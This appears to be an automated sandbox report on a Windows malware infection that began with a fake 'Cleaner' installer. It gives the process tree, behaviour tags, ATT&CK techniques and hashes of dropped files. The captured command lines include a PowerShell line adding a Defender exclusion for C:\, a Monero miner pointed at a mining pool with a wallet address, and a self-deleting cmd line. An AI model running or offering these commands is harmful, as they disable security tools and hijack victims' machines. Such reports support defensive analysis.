C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding D40F7DA8B14C3E4EACFCCA56AD04B59E2⤵
- Blocklisted process makes network request
-
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\aipackagechainer.exe"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\aipackagechainer.exe"2⤵
- Adds Run key to start application
-
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\RequiredApplication_1\Cleaner_Installation.exe"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\RequiredApplication_1\Cleaner_Installation.exe" -silent=1 -CID=717 -SID=717 -submn=default3⤵
- Adds Run key to start application
-
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" "--anbfs"4⤵
- Suspicious use of SendNotifyMessage
-
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exeC:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Cleaner\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Cleaner\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Cleaner\User Data" --annotation=plat=Win64 --annotation=prod=Cleaner --annotation=ver=0.0.13 --initial-client-data=0x204,0x208,0x20c,0x1f0,0x210,0x7ffccbf7dec0,0x7ffccbf7ded0,0x7ffccbf7dee05⤵
- Loads dropped DLL
- Checks processor information in registry
- Enumerates system info in registry
- Modifies registry class
-
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=gpu-process --field-trial-handle=1680,9644653386668169303,11900342527817936668,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6520_1790923107" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1692 /prefetch:25⤵
-
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1680,9644653386668169303,11900342527817936668,131072 --lang=en-US --service-sandbox-type=network --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6520_1790923107" --mojo-platform-channel-handle=1780 /prefetch:85⤵
- Modifies system certificate store
-
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1680,9644653386668169303,11900342527817936668,131072 --lang=en-US --service-sandbox-type=utility --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6520_1790923107" --mojo-platform-channel-handle=2224 /prefetch:85⤵
-
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Cleaner\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1680,9644653386668169303,11900342527817936668,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6520_1790923107" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --mojo-platform-channel-handle=2544 /prefetch:15⤵
-
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Cleaner\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1680,9644653386668169303,11900342527817936668,131072 --disable-gpu-compositing --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6520_1790923107" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --mojo-platform-channel-handle=2584 /prefetch:15⤵
-
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=gpu-process --field-trial-handle=1680,9644653386668169303,11900342527817936668,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6520_1790923107" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=3128 /prefetch:25⤵
- Modifies registry class
-
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1680,9644653386668169303,11900342527817936668,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6520_1790923107" --mojo-platform-channel-handle=3264 /prefetch:85⤵
-
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1680,9644653386668169303,11900342527817936668,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6520_1790923107" --mojo-platform-channel-handle=2640 /prefetch:85⤵
-
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1680,9644653386668169303,11900342527817936668,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6520_1790923107" --mojo-platform-channel-handle=3588 /prefetch:85⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1680,9644653386668169303,11900342527817936668,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6520_1790923107" --mojo-platform-channel-handle=2244 /prefetch:85⤵
-
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1680,9644653386668169303,11900342527817936668,131072 --lang=en-US --service-sandbox-type=utility --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6520_1790923107" --mojo-platform-channel-handle=3880 /prefetch:85⤵
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" -NonInteractive -NoLogo -ExecutionPolicy AllSigned -Command "C:\Users\Admin\AppData\Local\Temp\AI_7AFC.ps1 -paths 'C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\file_deleter.ps1','C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\aipackagechainer.exe','C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites' -retry_count 10"3⤵
- Blocklisted process makes network request
-
C:\Windows\Installer\MSI50ED.tmp"C:\Windows\Installer\MSI50ED.tmp"2⤵
- Drops file in Drivers directory
- Drops file in Windows directory
- Checks SCSI registry key(s)
-
C:\Windows\Installer\MSI50DC.tmp"C:\Windows\Installer\MSI50DC.tmp"2⤵
-
C:\Users\Admin\AppData\Local\23432445514.exe"C:\Users\Admin\AppData\Local\23432445514.exe"3⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 6901F139CB2642B19818E357904A3D502⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 6808 -ip 68081⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 5608 -ip 56081⤵
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
-
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3988 -s 4523⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 3988 -ip 39881⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s BITS1⤵
- Modifies data under HKEY_USERS
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV1⤵
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}1⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 6256 -ip 62561⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\system32\wbem\WMIADAP.EXEwmiadap.exe /F /T /R1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch -p -s DeviceInstall1⤵
- Drops file in Windows directory
- Checks SCSI registry key(s)
-
C:\Windows\system32\DrvInst.exeDrvInst.exe "4" "0" "C:\Users\Admin\AppData\Local\Temp\{19bb066f-d5a1-0c43-a8eb-1a493d48f07b}\oemvista.inf" "9" "4d14a44ff" "0000000000000150" "WinSta0\Default" "0000000000000160" "208" "c:\program files (x86)\maskvpn\driver\win764"2⤵
- Drops file in System32 directory
- Drops file in Windows directory
- Checks SCSI registry key(s)
- Modifies data under HKEY_USERS
-
C:\Windows\system32\DrvInst.exeDrvInst.exe "2" "211" "ROOT\NET\0000" "C:\Windows\INF\oem2.inf" "oem2.inf:3beb73aff103cc24:tap0901.ndi:9.0.0.21:tap0901," "4d14a44ff" "0000000000000150" "9199"2⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s DsmSvc1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s NetSetupSvc1⤵
-
C:\Program Files (x86)\MaskVPN\mask_svc.exe"C:\Program Files (x86)\MaskVPN\mask_svc.exe"1⤵
- Loads dropped DLL
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Modifies data under HKEY_USERS
-
C:\Program Files (x86)\MaskVPN\MaskVPNUpdate.exeMaskVPNUpdate.exe /silent2⤵
- Drops file in Program Files directory
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 440 -p 1216 -ip 12161⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 5264 -ip 52641⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 5728 -ip 57281⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 4172 -ip 41721⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 5308 -ip 53081⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 1852 -ip 18521⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 572 -p 1372 -ip 13721⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 412 -p 6608 -ip 66081⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 608 -p 7016 -ip 70161⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 616 -p 3828 -ip 38281⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 2608 -ip 26081⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Users\Admin\AppData\Local\Temp\83D6.exeC:\Users\Admin\AppData\Local\Temp\83D6.exe1⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\83D6.exeC:\Users\Admin\AppData\Local\Temp\83D6.exe2⤵
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\AppData\Local\Temp\97DC.exeC:\Users\Admin\AppData\Local\Temp\97DC.exe1⤵
-
C:\Users\Admin\AppData\Local\Temp\97DC.exeC:\Users\Admin\AppData\Local\Temp\97DC.exe2⤵
-
C:\Users\Admin\AppData\Local\Temp\A710.exeC:\Users\Admin\AppData\Local\Temp\A710.exe1⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 940 -s 2402⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\AppData\Local\Temp\B48E.exeC:\Users\Admin\AppData\Local\Temp\B48E.exe1⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1052 -s 2922⤵
- Program crash
-
C:\Users\Admin\AppData\Local\Temp\E718.exeC:\Users\Admin\AppData\Local\Temp\E718.exe1⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV12⤵
- Drops file in Windows directory
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 624 -p 940 -ip 9401⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 600 -p 1052 -ip 10521⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Users\Admin\AppData\Local\Temp\5EC.exeC:\Users\Admin\AppData\Local\Temp\5EC.exe1⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6400 -s 2362⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\AppData\Local\Temp\2C51.exeC:\Users\Admin\AppData\Local\Temp\2C51.exe1⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\AppData\Local\Temp\35A9.exeC:\Users\Admin\AppData\Local\Temp\35A9.exe1⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5236 -s 2362⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\AppData\Local\Temp\5C5C.exeC:\Users\Admin\AppData\Local\Temp\5C5C.exe1⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c rd /s /q C:\Users\Admin\AppData\Local\Temp\VpmBTAoUfJ & timeout 4 & del /f /q "C:\Users\Admin\AppData\Local\Temp\5C5C.exe"2⤵
-
C:\Windows\SysWOW64\timeout.exetimeout 43⤵
- Delays execution with timeout.exe
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 6400 -ip 64001⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Users\Admin\AppData\Local\Temp\63A0.exeC:\Users\Admin\AppData\Local\Temp\63A0.exe1⤵
-
C:\Users\Admin\AppData\Local\Temp\6CAA.exeC:\Users\Admin\AppData\Local\Temp\6CAA.exe1⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection google.com2⤵
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection google.com2⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection google.com2⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection google.com2⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection google.com2⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\_Diubxzpru.vbs"2⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -ExclusionPath C:\,'C:\Users\Admin\AppData\Roaming\Chrome.exe'3⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\6CAA.exeC:\Users\Admin\AppData\Local\Temp\6CAA.exe2⤵
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe -o pool.supportxmr.com:3333 -u 45GbdESKzpGRYYfJtmN5V86B4Q3afV1vtc3zaR9PqY5ndjTkct1xP2TcZo5CFcokxTAi9pZxkPVna74PG6wK8bMXPC78tKg.wk -p x --algo rx/03⤵
-
C:\Users\Admin\AppData\Local\Temp\7B41.exeC:\Users\Admin\AppData\Local\Temp\7B41.exe1⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\7B41.exe"C:\Users\Admin\AppData\Local\Temp\7B41.exe"2⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3108 -s 15282⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3108 -s 15282⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 668 -p 5236 -ip 52361⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Users\Admin\AppData\Local\Temp\8748.exeC:\Users\Admin\AppData\Local\Temp\8748.exe1⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1808 -s 2562⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\AppData\Local\Temp\94B7.exeC:\Users\Admin\AppData\Local\Temp\94B7.exe1⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\94B7.exe"C:\Users\Admin\AppData\Local\Temp\94B7.exe"2⤵
-
C:\Users\Admin\AppData\Local\Temp\94B7.exe"C:\Users\Admin\AppData\Local\Temp\94B7.exe"2⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3168 -s 15082⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3168 -s 15282⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 676 -p 1808 -ip 18081⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 680 -p 3108 -ip 31081⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 680 -p 3168 -ip 31681⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 668 -p 3108 -ip 31081⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 3168 -ip 31681⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Checks BIOS information in registry
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Checks processor information in registry
Network
MITRE ATT&CK Matrix ATT&CK v6
Persistence
Modify Existing Service
1Registry Run Keys / Startup Folder
1Scheduled Task
1Defense Evasion
Modify Registry
3Disabling Security Tools
1Virtualization/Sandbox Evasion
1Install Root Certificate
1Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\ProgramData\4205929.exeMD5
05213c90ae83f9a9721ec8556d989b3f
SHA16b08770d890d232fa912b4fbc3a18b7a69afa006
SHA2563d4e9dcaedad519133be041dd9dc02d6ba9aa241a2f4ebc90bcf21147d5d5a9d
SHA5121ff033fa4787ccdd1ffe2d97f1475597abe1a7af97076fa7ef09f370e54d3bac333530055048fa6272c3afef2ba57b63c219c99155483a4885ae1ffe823f2d0d
-
C:\ProgramData\4205929.exeMD5
05213c90ae83f9a9721ec8556d989b3f
SHA16b08770d890d232fa912b4fbc3a18b7a69afa006
SHA2563d4e9dcaedad519133be041dd9dc02d6ba9aa241a2f4ebc90bcf21147d5d5a9d
SHA5121ff033fa4787ccdd1ffe2d97f1475597abe1a7af97076fa7ef09f370e54d3bac333530055048fa6272c3afef2ba57b63c219c99155483a4885ae1ffe823f2d0d
-
C:\Users\Admin\AppData\Local\Temp\2.exeMD5
ef9a6cfeb87ebc90a75c9cc9c5b19a5f
SHA1cb4a635212242913b6841323c0b582efbae7fd12
SHA2566e7bf35a20d679ab4e1dbb83fc8b542d59f8789d083ff0c0f8566edec2fef522
SHA5123abcb426fe968f3bd87d234447fd7fdde87cc98b3de46e4fc39c1530714ff64c25045012e9f44aba1ce42041f41937d111ad8b0b9d2c0cb441ae0ed54228c2dc
-
C:\Users\Admin\AppData\Local\Temp\2.exeMD5
ef9a6cfeb87ebc90a75c9cc9c5b19a5f
SHA1cb4a635212242913b6841323c0b582efbae7fd12
SHA2566e7bf35a20d679ab4e1dbb83fc8b542d59f8789d083ff0c0f8566edec2fef522
SHA5123abcb426fe968f3bd87d234447fd7fdde87cc98b3de46e4fc39c1530714ff64c25045012e9f44aba1ce42041f41937d111ad8b0b9d2c0cb441ae0ed54228c2dc
-
C:\Users\Admin\AppData\Local\Temp\7zS443F3EF3\Thu2102ff6cfe07c.exeMD5
a1c7ed2563212e0aba70af8a654962fd
SHA1987e944110921327adaba51d557dbf20dee886d5
SHA256a15773680b31415eeebf20246f283857bda7e7dda16f4674c2cbeba2106e3592
SHA51260d827b6d36d6f3a1b4af445b25f26812043d2be8934c338d29b8a1bbe0b50d8a7c06f54ea14afa1d9dbbc6340c649dc51b0ae12d77329e1fb6fdf99e896a462
-
C:\Users\Admin\AppData\Local\Temp\7zS443F3EF3\Thu2102ff6cfe07c.exeMD5
a1c7ed2563212e0aba70af8a654962fd
SHA1987e944110921327adaba51d557dbf20dee886d5
SHA256a15773680b31415eeebf20246f283857bda7e7dda16f4674c2cbeba2106e3592
SHA51260d827b6d36d6f3a1b4af445b25f26812043d2be8934c338d29b8a1bbe0b50d8a7c06f54ea14afa1d9dbbc6340c649dc51b0ae12d77329e1fb6fdf99e896a462
-
C:\Users\Admin\AppData\Local\Temp\7zS443F3EF3\Thu214aaca5625.exeMD5
b160ce13f27f1e016b7bfc7a015f686b
SHA1bfb714891d12ffd43875e72908d8b9f4f576ad6e
SHA256fac205247d3b19b5f82f5f4d1269a5c047b6c9ad9f21cc51b4b782c2b08a3b87
SHA5129578fc34807be2541aa7dc26acbe27211e96b42c6c4208afe195b19b08264dfeb3ea7fec637c759f062cbd5561c5140ecd68cd5c79efbb844d3b2639e336ca0c
-
C:\Users\Admin\AppData\Local\Temp\7zS443F3EF3\Thu214aaca5625.exeMD5
b160ce13f27f1e016b7bfc7a015f686b
SHA1bfb714891d12ffd43875e72908d8b9f4f576ad6e
SHA256fac205247d3b19b5f82f5f4d1269a5c047b6c9ad9f21cc51b4b782c2b08a3b87
SHA5129578fc34807be2541aa7dc26acbe27211e96b42c6c4208afe195b19b08264dfeb3ea7fec637c759f062cbd5561c5140ecd68cd5c79efbb844d3b2639e336ca0c
-
C:\Users\Admin\AppData\Local\Temp\7zS443F3EF3\Thu214ce31cede21.exeMD5
a586c386b45ea216ace83b4961396e63
SHA16b60b690d4b066d71a0a3a4c623b49493ad59d75
SHA25678e41d72b929603ea213b876c5707d133742b7234f0460f43f80ab96a69a799c
SHA512ffed90ec2a87ad06c338db0d4631e195ad4d6036ca910a39aee305cb7223a9e7231d004b09cf3fee845daac6629af39fa278be03c1f46c2552ed0340ff5095af
-
C:\Users\Admin\AppData\Local\Temp\7zS443F3EF3\Thu214ce31cede21.exeMD5
a586c386b45ea216ace83b4961396e63
SHA16b60b690d4b066d71a0a3a4c623b49493ad59d75
SHA25678e41d72b929603ea213b876c5707d133742b7234f0460f43f80ab96a69a799c
SHA512ffed90ec2a87ad06c338db0d4631e195ad4d6036ca910a39aee305cb7223a9e7231d004b09cf3fee845daac6629af39fa278be03c1f46c2552ed0340ff5095af
-
C:\Users\Admin\AppData\Local\Temp\7zS443F3EF3\Thu21568b0ab8.exeMD5
78a80556b64f85f6d215e12b7c6f051c
SHA1b76e4be025c4a06453916d1514a1e84328451ed1
SHA256cf9be5a04001fd464a9cd8c47dcf16edd9523846dd90b76aa361d48901a6dd07
SHA512b34ea5b6e19e886f45a0348e23c87432a3d1c6b2357195e6f643fea18213581beab2764712b9fdf4860080ea12207131ca026e2086dc9441151fcd39924f19f2
-
C:\Users\Admin\AppData\Local\Temp\7zS443F3EF3\Thu21568b0ab8.exeMD5
78a80556b64f85f6d215e12b7c6f051c
SHA1b76e4be025c4a06453916d1514a1e84328451ed1
SHA256cf9be5a04001fd464a9cd8c47dcf16edd9523846dd90b76aa361d48901a6dd07
SHA512b34ea5b6e19e886f45a0348e23c87432a3d1c6b2357195e6f643fea18213581beab2764712b9fdf4860080ea12207131ca026e2086dc9441151fcd39924f19f2
-
C:\Users\Admin\AppData\Local\Temp\7zS443F3EF3\Thu2156de5489c19.exeMD5
b9d6fa9af107c8f185fa981e9365a3ec
SHA177b4459537959d478a4dc9ba64c80d44a278f679
SHA25637b758e9d8ac0212bde2acff6c6a1d53f0bfcc202f2d129a7ee4e0a4dcac3770
SHA512a9c631b58686dd0b86c95046709d667fae31dddd7a74b62235840d67d2aa4b2ce1cdc235f87d151c880137ee7d69cb934dc6239aada7de9b532b331b9e54b090
-
